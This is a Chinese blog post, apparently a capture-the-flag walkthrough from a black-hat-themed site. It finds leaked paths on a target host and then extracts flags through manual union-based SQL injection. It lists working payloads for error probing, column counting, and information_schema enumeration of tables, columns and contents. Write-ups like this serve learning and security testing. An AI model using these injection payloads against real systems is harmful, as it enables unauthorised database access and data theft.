首页/入侵资料/正文
手工注入基本思路

 2021年12月24日  阅读 811  评论 0

摘要:信息泄露手工注入2|0 渗透思路1. 返回包信息中泄露重要目录(1)访问http://112.44.218.141:2014是一个空白页面,开始想到的就是查看robots,然后御剑目录扫描都没有得到有发现目录;然后就使用burp截包,可以看到提示目录welcome_solkdjiejq.php (2)访问http://112.44.218.141:2014/welcome_solkdjiejq.php得到flag(flag理解为web中一个重要信息):(3)查看源码得到一个目
  1. 信息泄露

  2. 手工注入


2|0 渗透思路

1. 返回包信息中泄露重要目录

(1)访问http://112.44.218.141:2014是一个空白页面,开始想到的就是查看robots,然后御剑目录扫描都没有得到有发现目录;然后就使用burp截包,可以看到提示目录welcome_solkdjiejq.php

 

(2)访问http://112.44.218.141:2014/welcome_solkdjiejq.php得到flag(flag理解为web中一个重要信息):

(3)查看源码得到一个目录/system_jioqwjod.php

 

访问提示只用本机可以登录

(4)访问http://112.44.218.141:2014/system_jioqwjod.php使用burp截包得到flag:

 

另外得到location: system_skkkwwwwqad/index.php

 

2.SQL注入

访问http://112.44.218.141:2014/system_skkkwwwwqad/index.php点击report1

1)在url后添加一个’报错,存在报错注入点

 

2)判断列数使用oder by n#

Order by 2#回显正常

Order by  3#回显错位,那么应该为2列;

3)判断回显为

 id=-1 union select 88,99#回显为第二列位置

 

(4)暴数据库http://112.44.218.141:2014/system_skkkwwwwqad/index.php?id=-2 union select 1,database()#

 

(5)暴数据表

暴数据库news下的第一个表f3aagg:

id=-2 union select 1,(select table_name from information_schema.tables where table_schema="news" limit 0,1)#

 

第二个表news:

id=-2 union select 1,(select table_name from information_schema.tables where table_schema="news" limit 1,1)#

 

6)暴表f3aagg下的字段为f3gg1

id=-2 union select 1,(select column_name from information_schema.columns where table_name="f3aagg" limit 0,1)#

 

(7)查看内容得到flag{eccbc87e4b5ce2fe28308fd9f2a7baf3}

id=-2 union select 1,(select * from f3aagg limit 0,1)#

 

这就是sql注入基本的完整思路,按照这样方法可以再查看其它表、字段信息;


版权声明:本文为 “黑帽百科” 原创文章,转载请附上原文出处链接及本声明;

原文链接:https://www.heimao.wiki/post/56263.html

标签: 黑帽技术 

发表评论:

关于我们
黑帽百科:黑帽seo百科,黑帽seo技术学习培训分享,黑帽SEO快排程序分享,定制。 SEO快速排名收录学习 老师qq:25496334
扫码关注
联系方式
全国服务热线:
地址:新加坡 - 市中心(Singapore City)乌节路
Email:hack66666@foxamil.com
邮编:
Copyright Your 黑帽百科.|网站地图.Some Rights Reserved.